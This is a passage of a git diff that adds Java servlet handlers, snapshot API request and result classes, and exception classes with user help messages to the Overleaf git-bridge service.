Util.getContentsOfReader(request.getReader()); + String[] parts = target.split("/"); + if (parts.length < 4) { + throw new ServletException(); + } + String projectName = parts[1]; + String postbackKey = parts[2]; + PostbackContents postbackContents = + new PostbackContents(bridge, projectName, postbackKey, contents); + JsonObject body = new JsonObject(); + + try { + postbackContents.processPostback(); + } catch (UnexpectedPostbackException e) { + response.setStatus(HttpServletResponse.SC_CONFLICT); + body.add("code", new JsonPrimitive("unexpectedPostback")); + response.getWriter().println(body); + baseRequest.setHandled(true); + return; + } + response.setStatus(HttpServletResponse.SC_OK); + body.add("code", new JsonPrimitive("success")); + response.getWriter().println(body); + baseRequest.setHandled(true); + } + } catch (IOException e) { + Log.warn("IOException when handling postback to target: " + target, e); + throw e; + } catch (ServletException e) { + Log.warn("ServletException when handling postback to target: " + target, e); + throw e; + } catch (RuntimeException e) { + Log.warn("RuntimeException when handling postback to target: " + target, e); + throw e; + } + } +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/server/ProductionErrorHandler.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/server/ProductionErrorHandler.java new file mode 100644 index 0000000..ca21a82 --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/server/ProductionErrorHandler.java @@ -0,0 +1,22 @@ +package uk.ac.ic.wlgitbridge.server; + +import java.io.IOException; +import javax.servlet.http.HttpServletRequest; +import javax.servlet.http.HttpServletResponse; +import org.eclipse.jetty.server.handler.ErrorHandler; + +public class ProductionErrorHandler extends ErrorHandler { + @Override + public void handle( + String target, + org.eclipse.jetty.server.Request baseRequest, + HttpServletRequest request, + HttpServletResponse response) + throws IOException { + response + .getWriter() + .append("{\"message\":\"HTTP error ") + .append(String.valueOf(response.getStatus())) + .append("\"}"); + } +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/server/ProjectDeletionHandler.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/server/ProjectDeletionHandler.java new file mode 100644 index 0000000..731a75e --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/server/ProjectDeletionHandler.java @@ -0,0 +1,35 @@ +package uk.ac.ic.wlgitbridge.server; + +import java.io.IOException; +import java.util.regex.Matcher; +import java.util.regex.Pattern; +import javax.servlet.http.HttpServletRequest; +import javax.servlet.http.HttpServletResponse; +import org.eclipse.jetty.server.Request; +import org.eclipse.jetty.server.handler.AbstractHandler; +import uk.ac.ic.wlgitbridge.bridge.Bridge; + +public class ProjectDeletionHandler extends AbstractHandler { + + private final Bridge bridge; + private final Pattern routePattern = Pattern.compile("^/projects/([0-9a-f]{24})$"); + + public ProjectDeletionHandler(Bridge bridge) { + this.bridge = bridge; + } + + @Override + public void handle( + String target, Request baseRequest, HttpServletRequest request, HttpServletResponse response) + throws IOException { + String method = baseRequest.getMethod(); + Matcher matcher = routePattern.matcher(target); + if (method.equals("DELETE") && target != null && matcher.matches()) { + String projectName = matcher.group(1); + response.setContentType("text/plain"); + response.setStatus(204); + this.bridge.deleteProject(projectName); + baseRequest.setHandled(true); + } + } +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/server/PrometheusHandler.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/server/PrometheusHandler.java new file mode 100644 index 0000000..315b458 --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/server/PrometheusHandler.java @@ -0,0 +1,65 @@ +package uk.ac.ic.wlgitbridge.server; + +import io.prometheus.client.CollectorRegistry; +import io.prometheus.client.exporter.common.TextFormat; +import io.prometheus.client.hotspot.DefaultExports; +import java.io.BufferedWriter; +import java.io.IOException; +import java.io.Writer; +import java.util.Arrays; +import java.util.Collections; +import java.util.HashSet; +import java.util.Set; +import javax.servlet.ServletException; +import javax.servlet.http.HttpServletRequest; +import javax.servlet.http.HttpServletResponse; +import org.eclipse.jetty.server.Request; +import org.eclipse.jetty.server.handler.AbstractHandler; +import uk.ac.ic.wlgitbridge.util.Log; + +public class PrometheusHandler extends AbstractHandler { + + public PrometheusHandler() { + DefaultExports.initialize(); + } + + @Override + public void handle( + String target, Request baseRequest, HttpServletRequest request, HttpServletResponse response) + throws IOException, ServletException { + String method = baseRequest.getMethod(); + if (("GET".equals(method)) && target != null && target.matches("^/metrics/?$")) { + Log.debug(method + " <- /metrics"); + this.printMetrics(request, response); + baseRequest.setHandled(true); + } + } + + private void printMetrics(HttpServletRequest request, HttpServletResponse response) + throws ServletException, IOException { + response.setStatus(200); + String contentType = TextFormat.chooseContentType(request.getHeader("Accept")); + response.setContentType(contentType); + + Writer writer = new BufferedWriter(response.getWriter()); + + try { + TextFormat.writeFormat( + contentType, + writer, + CollectorRegistry.defaultRegistry.filteredMetricFamilySamples(parse(request))); + writer.flush(); + } finally { + writer.close(); + } + } + + private Set<String> parse(HttpServletRequest req) { + String[] includedParam = req.getParameterValues("name[]"); + if (includedParam == null) { + return Collections.emptySet(); + } else { + return new HashSet<String>(Arrays.asList(includedParam)); + } + } +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/server/StatusHandler.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/server/StatusHandler.java new file mode 100644 index 0000000..6750fa0 --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/server/StatusHandler.java @@ -0,0 +1,34 @@ +package uk.ac.ic.wlgitbridge.server; + +import java.io.IOException; +import javax.servlet.http.HttpServletRequest; +import javax.servlet.http.HttpServletResponse; +import org.eclipse.jetty.server.Request; +import org.eclipse.jetty.server.handler.AbstractHandler; +import uk.ac.ic.wlgitbridge.bridge.Bridge; +import uk.ac.ic.wlgitbridge.util.Log; + +public class StatusHandler extends AbstractHandler { + + private final Bridge bridge; + + public StatusHandler(Bridge bridge) { + this.bridge = bridge; + } + + @Override + public void handle( + String target, Request baseRequest, HttpServletRequest request, HttpServletResponse response) + throws IOException { + String method = baseRequest.getMethod(); + if (("GET".equals(method) || "HEAD".equals(method)) + && target != null + && target.matches("^/status/?$")) { + Log.debug(method + " <- /status"); + baseRequest.setHandled(true); + response.setContentType("text/plain"); + response.setStatus(200); + response.getWriter().println("ok"); + } + } +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/base/ForbiddenException.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/base/ForbiddenException.java new file mode 100644 index 0000000..9068223 --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/base/ForbiddenException.java @@ -0,0 +1,25 @@ +package uk.ac.ic.wlgitbridge.snapshot.base; + +import com.google.gson.JsonElement; +import java.util.Arrays; +import java.util.List; +import uk.ac.ic.wlgitbridge.git.exception.SnapshotAPIException; + +/* + * Created by winston on 25/10/15. + */ +public class ForbiddenException extends SnapshotAPIException { + + @Override + public void fromJSON(JsonElement json) {} + + @Override + public String getMessage() { + return "forbidden"; + } + + @Override + public List<String> getDescriptionLines() { + return Arrays.asList(getMessage()); + } +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/base/HTTPMethod.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/base/HTTPMethod.java new file mode 100644 index 0000000..30bc2d5 --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/base/HTTPMethod.java @@ -0,0 +1,9 @@ +package uk.ac.ic.wlgitbridge.snapshot.base; + +/* + * Created by Winston on 16/11/14. + */ +public enum HTTPMethod { + POST, + GET +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/base/JSONSource.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/base/JSONSource.java new file mode 100644 index 0000000..764384b --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/base/JSONSource.java @@ -0,0 +1,11 @@ +package uk.ac.ic.wlgitbridge.snapshot.base; + +import com.google.gson.JsonElement; + +/* + * Created by Winston on 06/11/14. + */ +public interface JSONSource { + + void fromJSON(JsonElement json); +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/base/MissingRepositoryException.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/base/MissingRepositoryException.java new file mode 100644 index 0000000..5b26c4e --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/base/MissingRepositoryException.java @@ -0,0 +1,93 @@ +package uk.ac.ic.wlgitbridge.snapshot.base; + +import com.google.gson.JsonElement; +import java.util.Arrays; +import java.util.List; +import uk.ac.ic.wlgitbridge.git.exception.SnapshotAPIException; + +public class MissingRepositoryException extends SnapshotAPIException { + + public static final List<String> GENERIC_REASON = + Arrays.asList( + "This Overleaf project currently has no git access, either because", + "the project does not exist, or because git access is not enabled", + "for the project.", + "", + "If this is unexpected, please contact us at support@overleaf.com, or", + "see https://www.overleaf.com/learn/how-to/Git_integration for more information."); + + static List<String> buildDeprecatedMessage(String newUrl) { + if (newUrl == null) { + return Arrays.asList( + "This project has not yet been moved into the new version of Overleaf. You will", + "need to move it in order to continue working on it. Please visit this project", + "online on www.overleaf.com to do this.", + "", + "After migrating this project to the new version of Overleaf, you will be", + "prompted to update your git remote to the project's new identifier.", + "", + "If this is unexpected, please contact us at support@overleaf.com, or", + "see https://www.overleaf.com/learn/how-to/Git_integration for more information."); + } else { + return Arrays.asList( + "This project has not yet been moved into the new version of Overleaf. You will", + "need to move it in order to continue working on it. Please visit this project", + "online to do this:", + "", + " " + newUrl, + "", + "After migrating this project to the new version of Overleaf, you will be", + "prompted to update your git remote to the project's new identifier.", + "", + "If this is unexpected, please contact us at support@overleaf.com, or", + "see https://www.overleaf.com/learn/how-to/Git_integration for more information."); + } + } + + static List<String> buildExportedToV2Message(String remoteUrl) { + if (remoteUrl == null) { + return Arrays.asList( + "This Overleaf project has been moved to Overleaf v2 and cannot be used with git at this time.", + "", + "If this error persists, please contact us at support@overleaf.com, or", + "see https://www.overleaf.com/learn/how-to/Git_integration for more information."); + } else { + return Arrays.asList( + "This Overleaf project has been moved to Overleaf v2 and has a new identifier.", + "Please update your remote to:", + "", + " " + remoteUrl, + "", + "Assuming you are using the default \"origin\" remote, the following commands", + "will change the remote for you:", + "", + " git remote set-url origin " + remoteUrl, + "", + "If this does not work, please contact us at support@overleaf.com, or", + "see https://www.overleaf.com/learn/how-to/Git_integration for more information."); + } + } + + private List<String> descriptionLines; + + public MissingRepositoryException() { + this.descriptionLines = GENERIC_REASON; + } + + public MissingRepositoryException(List<String> descriptionLines) { + this.descriptionLines = descriptionLines; + } + + @Override + public void fromJSON(JsonElement json) {} + + @Override + public String getMessage() { + return "no git access"; + } + + @Override + public List<String> getDescriptionLines() { + return this.descriptionLines; + } +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/base/Request.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/base/Request.java new file mode 100644 index 0000000..4c5f318 --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/base/Request.java @@ -0,0 +1,197 @@ +package uk.ac.ic.wlgitbridge.snapshot.base; + +import static org.asynchttpclient.Dsl.*; + +import com.google.api.client.http.*; +import com.google.gson.JsonElement; +import com.google.gson.JsonObject; +import java.io.IOException; +import java.util.Arrays; +import java.util.concurrent.*; +import javax.servlet.http.HttpServletResponse; +import org.asynchttpclient.AsyncHttpClient; +import uk.ac.ic.wlgitbridge.snapshot.exception.FailedConnectionException; +import uk.ac.ic.wlgitbridge.util.Instance; +import uk.ac.ic.wlgitbridge.util.Log; + +/* + * Created by Winston on 06/11/14. + */ +public abstract class Request<T extends Result> { + + public static final AsyncHttpClient httpClient = asyncHttpClient(); + + private static final Executor executor = Executors.newCachedThreadPool(); + + private final String url; + + private Future<HttpResponse> future; + + public Request(String url) { + this.url = url; + } + + public CompletableFuture<T> request() { + switch (httpMethod()) { + case GET: + performGetRequest(); + break; + case POST: + performPostRequest(); + break; + default: + break; + } + CompletableFuture<T> ret = new CompletableFuture<>(); + executor.execute( + () -> { + try { + ret.complete(getResult()); + } catch (Throwable t) { + ret.completeExceptionally(t); + } + }); + return ret; + } + + private T getResult() + throws MissingRepositoryException, FailedConnectionException, ForbiddenException { + try { + HttpResponse response = future.get(); + Log.debug( + "{} {} ({}B) -> " + url, + response.getStatusCode(), + response.getStatusMessage(), + response.getHeaders().getContentLength()); + JsonElement json = Instance.gson.fromJson(response.parseAsString(), JsonElement.class); + return parseResponse(json); + } catch (InterruptedException e) { + throw new FailedConnectionException(); + } catch (ExecutionException e) { + Throwable cause = e.getCause(); + if (cause instanceof HttpResponseException) { + HttpResponseException httpCause = (HttpResponseException) cause; + int sc = httpCause.getStatusCode(); + if (sc == HttpServletResponse.SC_UNAUTHORIZED + || sc == HttpServletResponse.SC_FORBIDDEN) { // 401, 403 + throw new ForbiddenException(); + } else if (sc == 429) { // Too many requests + throw new MissingRepositoryException( + Arrays.asList( + "Rate-limit exceeded. Please wait a while and try again.", + "", + "If this is unexpected, please contact us at support@overleaf.com, or", + "see https://www.overleaf.com/learn/how-to/Git_integration for more information.")); + } else if (sc == HttpServletResponse.SC_CONFLICT) { // 409 + try { + JsonObject json = Instance.gson.fromJson(httpCause.getContent(), JsonObject.class); + String code = json.get("code").getAsString(); + if ("projectHasDotGit".equals(code)) { + throw new MissingRepositoryException( + Arrays.asList( + "This project contains a '.git' entity at the top level, indicating that it is", + "already a git repository. The Overleaf git-bridge cannot work with this project", + "due to a known problem with handling these '.git' folders.", + "", + "We recommend removing the .git folder before trying again.", + "", + "If this is unexpected, please contact us at support@overleaf.com, or", + "see https://www.overleaf.com/learn/how-to/Git_integration for more information.")); + } else { + throw new MissingRepositoryException(Arrays.asList("Conflict: 409")); + } + } catch (IllegalStateException + | ClassCastException + | NullPointerException _e) { // json parse errors + throw new MissingRepositoryException(Arrays.asList("Conflict: 409")); + } + } else if (sc == HttpServletResponse.SC_NOT_FOUND) { // 404 + try { + JsonObject json = Instance.gson.fromJson(httpCause.getContent(), JsonObject.class); + String message = json.get("message").getAsString(); + String newRemote; + if (json.has("newRemote")) { + newRemote = json.get("newRemote").getAsString(); + } else { + newRemote = null; + } + + if ("Exported to v2".equals(message)) { + throw new MissingRepositoryException( + MissingRepositoryException.buildExportedToV2Message(newRemote)); + } else if ("Overleaf v1 is Deprecated".equals(message)) { + String newUrl; + if (json.has("newUrl")) { + newUrl = json.get("newUrl").getAsString(); + } else { + newUrl = null; + } + throw new MissingRepositoryException( + MissingRepositoryException.buildDeprecatedMessage(newUrl)); + } + } catch (IllegalStateException | ClassCastException | NullPointerException ex) { + // disregard any errors that arose while handling the JSON + } + + throw new MissingRepositoryException(); + } else if (sc >= 400 && sc < 500) { + throw new MissingRepositoryException(MissingRepositoryException.GENERIC_REASON); + } + throw new FailedConnectionException(cause); + } else { + throw new FailedConnectionException(cause); + } + } catch (IOException e) { + Log.warn("Failed to parse JSON.", e); + throw new FailedConnectionException(); + } + } + + protected abstract HTTPMethod httpMethod(); + + protected void onBeforeRequest(HttpRequest request) throws IOException {} + + protected abstract T parseResponse(JsonElement json) throws FailedConnectionException; + + protected String getPostBody() { + return null; + } + + private void performGetRequest() { + Log.debug("GET -> " + url); + try { + HttpRequest request = Instance.httpRequestFactory.buildGetRequest(new GenericUrl(url)); + setTimeouts(request); + request(request); + } catch (IOException e) { + e.printStackTrace(); + throw new RuntimeException(e); + } + } + + private void performPostRequest() { + Log.debug("POST -> " + url); + try { + HttpRequest request = + Instance.httpRequestFactory.buildPostRequest( + new GenericUrl(url), + new ByteArrayContent("application/json", getPostBody().getBytes())); + setTimeouts(request); + request(request); + } catch (IOException e) { + e.printStackTrace(); + throw new RuntimeException(e); + } + } + + private void request(HttpRequest request) throws IOException { + onBeforeRequest(request); + future = request.executeAsync(); + } + + private void setTimeouts(HttpRequest request) { + // timeouts are 20s by default + int threeMinutesInMs = 1000 * 60 * 3; + request.setReadTimeout(threeMinutesInMs); + } +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/base/Result.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/base/Result.java new file mode 100644 index 0000000..2c4adb3 --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/base/Result.java @@ -0,0 +1,34 @@ +package uk.ac.ic.wlgitbridge.snapshot.base; + +import com.google.gson.JsonElement; + +/* + * Created by Winston on 06/11/14. + */ +public abstract class Result implements JSONSource { + + private JsonElement json; + private Request request; + + public Result(Request request, JsonElement json) { + this.request = request; + this.json = json; + fromJSON(json); + } + + protected Result() {} + + public Request getRequest() { + return request; + } + + public abstract JsonElement toJson(); + + @Override + public String toString() { + if (json == null) { + return "result"; + } + return json.toString(); + } +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/base/SnapshotAPIRequest.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/base/SnapshotAPIRequest.java new file mode 100644 index 0000000..7fc3b84 --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/base/SnapshotAPIRequest.java @@ -0,0 +1,34 @@ +package uk.ac.ic.wlgitbridge.snapshot.base; + +import com.google.api.client.auth.oauth2.Credential; +import com.google.api.client.http.HttpRequest; + +/* + * Created by Winston on 06/11/14. + */ +public abstract class SnapshotAPIRequest<T extends Result> extends Request<T> { + + private static String BASE_URL; + + private final Credential oauth2; + + public SnapshotAPIRequest(String projectName, String apiCall, Credential oauth2) { + super(BASE_URL + projectName + apiCall); + this.oauth2 = oauth2; + } + + @Override + protected void onBeforeRequest(HttpRequest request) { + if (oauth2 != null) { + request.setInterceptor( + request1 -> { + oauth2.intercept(request1); + }); + } + } + + /* baseURL ends with / */ + public static void setBaseURL(String baseURL) { + BASE_URL = baseURL + "docs/"; + } +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/exception/FailedConnectionException.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/exception/FailedConnectionException.java new file mode 100644 index 0000000..ee3187f --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/exception/FailedConnectionException.java @@ -0,0 +1,18 @@ +package uk.ac.ic.wlgitbridge.snapshot.exception; + +import org.eclipse.jgit.transport.ServiceMayNotContinueException; +import uk.ac.ic.wlgitbridge.util.Util; + +/* + * Created by Winston on 08/11/14. + */ +public class FailedConnectionException extends ServiceMayNotContinueException { + + public FailedConnectionException() { + super(Util.getServiceName() + " server not available. Please try again later."); + } + + public FailedConnectionException(Throwable cause) { + super(cause); + } +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/getdoc/GetDocRequest.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/getdoc/GetDocRequest.java new file mode 100644 index 0000000..94189a4 --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/getdoc/GetDocRequest.java @@ -0,0 +1,35 @@ +package uk.ac.ic.wlgitbridge.snapshot.getdoc; + +import com.google.api.client.auth.oauth2.Credential; +import com.google.gson.JsonElement; +import uk.ac.ic.wlgitbridge.snapshot.base.HTTPMethod; +import uk.ac.ic.wlgitbridge.snapshot.base.SnapshotAPIRequest; +import uk.ac.ic.wlgitbridge.snapshot.exception.FailedConnectionException; +import uk.ac.ic.wlgitbridge.util.Log; + +/* + * Created by Winston on 06/11/14. + */ +public class GetDocRequest extends SnapshotAPIRequest<GetDocResult> { + + public static final String API_CALL = ""; + + public GetDocRequest(Credential oauth2, String projectName) { + super(projectName, API_CALL, oauth2); + Log.debug("GetDocRequest({}, {})", "oauth2: <oauth2>", "projectName: " + projectName); + } + + public GetDocRequest(String projectName) { + this(null, projectName); + } + + @Override + protected HTTPMethod httpMethod() { + return HTTPMethod.GET; + } + + @Override + protected GetDocResult parseResponse(JsonElement json) throws FailedConnectionException { + return new GetDocResult(this, json); + } +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/getdoc/GetDocResult.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/getdoc/GetDocResult.java new file mode 100644 index 0000000..88c10ba --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/getdoc/GetDocResult.java @@ -0,0 +1,125 @@ +package uk.ac.ic.wlgitbridge.snapshot.getdoc; + +import com.google.gson.JsonElement; +import com.google.gson.JsonObject; +import uk.ac.ic.wlgitbridge.git.exception.GitUserException; +import uk.ac.ic.wlgitbridge.git.exception.SnapshotAPIException; +import uk.ac.ic.wlgitbridge.snapshot.base.ForbiddenException; +import uk.ac.ic.wlgitbridge.snapshot.base.Request; +import uk.ac.ic.wlgitbridge.snapshot.base.Result; +import uk.ac.ic.wlgitbridge.snapshot.exception.FailedConnectionException; +import uk.ac.ic.wlgitbridge.snapshot.getdoc.exception.InvalidProjectException; +import uk.ac.ic.wlgitbridge.snapshot.getsavedvers.WLUser; +import uk.ac.ic.wlgitbridge.util.Log; + +/* + * Created by Winston on 06/11/14. + */ +public class GetDocResult extends Result { + + private int error; + private int versionID; + private String createdAt; + private WLUser user; + + private SnapshotAPIException exception; + private ForbiddenException forbidden; + + public GetDocResult(Request request, JsonElement json) throws FailedConnectionException { + super(request, json); + } + + public GetDocResult( + JsonElement error, int versionID, String createdAt, String email, String name) { + if (error == null) { + this.error = -1; + } else { + this.error = error.getAsInt(); + } + this.versionID = versionID; + this.createdAt = createdAt; + this.user = new WLUser(name, email); + } + + @Override + public JsonElement toJson() { + JsonObject jsonThis = new JsonObject(); + if (error == -1) { + jsonThis.addProperty("latestVerId", versionID); + jsonThis.addProperty("latestVerAt", createdAt); + JsonObject latestVerBy = new JsonObject(); + latestVerBy.addProperty("email", getEmail()); + latestVerBy.addProperty("name", getName()); + jsonThis.add("latestVerBy", latestVerBy); + } else { + jsonThis.addProperty("status", error); + String message; + if (error == 403) { + message = "Forbidden"; + } else { + message = "Not Found"; + } + jsonThis.addProperty("message", message); + } + return jsonThis; + } + + @Override + public void fromJSON(JsonElement json) { + Log.debug("GetDocResult: " + json); + JsonObject jsonObject = json.getAsJsonObject(); + if (jsonObject.has("status")) { + switch (jsonObject.get("status").getAsInt()) { + case 401: + case 403: + forbidden = new ForbiddenException(); + break; + case 404: + exception = new InvalidProjectException(); + break; + default: + throw new IllegalArgumentException("unknown get doc error code"); + } + } else { + versionID = jsonObject.get("latestVerId").getAsInt(); + // Handle edge-case for projects with no changes, that were imported + // to v2. In which case `latestVerAt` will not be present. + // See: https://github.com/overleaf/writelatex-git-bridge/pull/50 + if (jsonObject.has("latestVerAt")) { + createdAt = jsonObject.get("latestVerAt").getAsString(); + } else { + createdAt = null; + } + String name = null; + String email = null; + JsonElement latestVerBy = jsonObject.get("latestVerBy"); + + if (latestVerBy.isJsonObject()) { + JsonObject userObject = latestVerBy.getAsJsonObject(); + name = userObject.get("name").getAsString(); + email = userObject.get("email").getAsString(); + } + + user = new WLUser(name, email); + } + } + + public int getVersionID() throws GitUserException { + if (exception != null) { + throw exception; + } + return versionID; + } + + public String getCreatedAt() { + return createdAt; + } + + public String getName() { + return user.getName(); + } + + public String getEmail() { + return user.getEmail(); + } +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/getdoc/exception/InvalidProjectException.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/getdoc/exception/InvalidProjectException.java new file mode 100644 index 0000000..86b9e20 --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/getdoc/exception/InvalidProjectException.java @@ -0,0 +1,39 @@ +package uk.ac.ic.wlgitbridge.snapshot.getdoc.exception; + +import com.google.gson.JsonArray; +import com.google.gson.JsonElement; +import java.util.LinkedList; +import java.util.List; +import uk.ac.ic.wlgitbridge.git.exception.SnapshotAPIException; + +/* + * Created by Winston on 08/11/14. + */ +public class InvalidProjectException extends SnapshotAPIException { + + private List<String> errors; + + public InvalidProjectException() { + super(); + errors = new LinkedList<String>(); + } + + @Override + public String getMessage() { + return "invalid project"; + } + + @Override + public List<String> getDescriptionLines() { + return errors; + } + + @Override + public void fromJSON(JsonElement json) { + errors = new LinkedList<String>(); + JsonArray errors = json.getAsJsonObject().get("errors").getAsJsonArray(); + for (JsonElement error : errors) { + this.errors.add(error.getAsString()); + } + } +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/getforversion/GetForVersionRequest.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/getforversion/GetForVersionRequest.java new file mode 100644 index 0000000..ca69f2e --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/getforversion/GetForVersionRequest.java @@ -0,0 +1,42 @@ +package uk.ac.ic.wlgitbridge.snapshot.getforversion; + +import com.google.api.client.auth.oauth2.Credential; +import com.google.gson.JsonElement; +import uk.ac.ic.wlgitbridge.snapshot.base.HTTPMethod; +import uk.ac.ic.wlgitbridge.snapshot.base.SnapshotAPIRequest; +import uk.ac.ic.wlgitbridge.snapshot.exception.FailedConnectionException; +import uk.ac.ic.wlgitbridge.util.Log; + +/* + * Created by Winston on 06/11/14. + */ +public class GetForVersionRequest extends SnapshotAPIRequest<GetForVersionResult> { + + public static final String API_CALL = "/snapshots"; + + private int versionID; + + public GetForVersionRequest(Credential oauth2, String projectName, int versionID) { + super(projectName, API_CALL + "/" + versionID, oauth2); + this.versionID = versionID; + Log.debug( + "GetForVersionRequest({}, {}, {})", + "oauth2: <oauth2>", + "projectName: " + projectName, + "versionID: " + versionID); + } + + @Override + protected HTTPMethod httpMethod() { + return HTTPMethod.GET; + } + + @Override + protected GetForVersionResult parseResponse(JsonElement json) throws FailedConnectionException { + return new GetForVersionResult(this, json); + } + + public int getVersionID() { + return versionID; + } +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/getforversion/GetForVersionResult.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/getforversion/GetForVersionResult.java new file mode 100644 index 0000000..63bf5eb --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/getforversion/GetForVersionResult.java @@ -0,0 +1,37 @@ +package uk.ac.ic.wlgitbridge.snapshot.getforversion; + +import com.google.gson.JsonElement; +import uk.ac.ic.wlgitbridge.snapshot.base.Request; +import uk.ac.ic.wlgitbridge.snapshot.base.Result; +import uk.ac.ic.wlgitbridge.util.Log; + +/* + * Created by Winston on 06/11/14. + */ +public class GetForVersionResult extends Result { + + private SnapshotData snapshotData; + + public GetForVersionResult(Request request, JsonElement json) { + super(request, json); + } + + public GetForVersionResult(SnapshotData snapshotData) { + this.snapshotData = snapshotData; + } + + @Override + public JsonElement toJson() { + return snapshotData.toJson(); + } + + @Override + public void fromJSON(JsonElement json) { + snapshotData = new SnapshotData(json); + Log.debug("GetForVersionResult({})", snapshotData); + } + + public SnapshotData getSnapshotData() { + return snapshotData; + } +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/getforversion/SnapshotAttachment.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/getforversion/SnapshotAttachment.java new file mode 100644 index 0000000..cb897d5 --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/getforversion/SnapshotAttachment.java @@ -0,0 +1,53 @@ +package uk.ac.ic.wlgitbridge.snapshot.getforversion; + +import com.google.gson.JsonArray; +import com.google.gson.JsonElement; +import com.google.gson.JsonPrimitive; +import uk.ac.ic.wlgitbridge.snapshot.base.JSONSource; + +/* + * Created by Winston on 06/11/14. + */ +public class SnapshotAttachment implements JSONSource { + + private String url; + private String path; + + public SnapshotAttachment(JsonElement json) { + fromJSON(json); + } + + @Override + public String toString() { + return "SnapshotAttachment(url: " + url + ", path: " + path + ")"; + } + + @Override + public void fromJSON(JsonElement json) { + JsonArray jsonArray = json.getAsJsonArray(); + url = jsonArray.get(0).getAsString(); + path = jsonArray.get(1).getAsString(); + } + + public String getUrl() { + return url; + } + + public String getPath() { + return path; + } + + /* For the Mock Snapshot server */ + + public SnapshotAttachment(String url, String path) { + this.url = url; + this.path = path; + } + + public JsonElement toJson() { + JsonArray jsonThis = new JsonArray(); + jsonThis.add(new JsonPrimitive(url)); + jsonThis.add(new JsonPrimitive(getPath())); + return jsonThis; + } +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/getforversion/SnapshotData.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/getforversion/SnapshotData.java new file mode 100644 index 0000000..bad0524 --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/getforversion/SnapshotData.java @@ -0,0 +1,77 @@ +package uk.ac.ic.wlgitbridge.snapshot.getforversion; + +import com.google.gson.JsonArray; +import com.google.gson.JsonElement; +import com.google.gson.JsonObject; +import java.util.ArrayList; +import java.util.List; +import uk.ac.ic.wlgitbridge.snapshot.base.JSONSource; + +/* + * Created by Winston on 06/11/14. + */ +public class SnapshotData implements JSONSource { + + public static final String JSON_KEY_SRCS = "srcs"; + public static final String JSON_KEY_ATTS = "atts"; + + private List<SnapshotFile> srcs; + private List<SnapshotAttachment> atts; + + public SnapshotData(JsonElement json) { + srcs = new ArrayList<>(); + 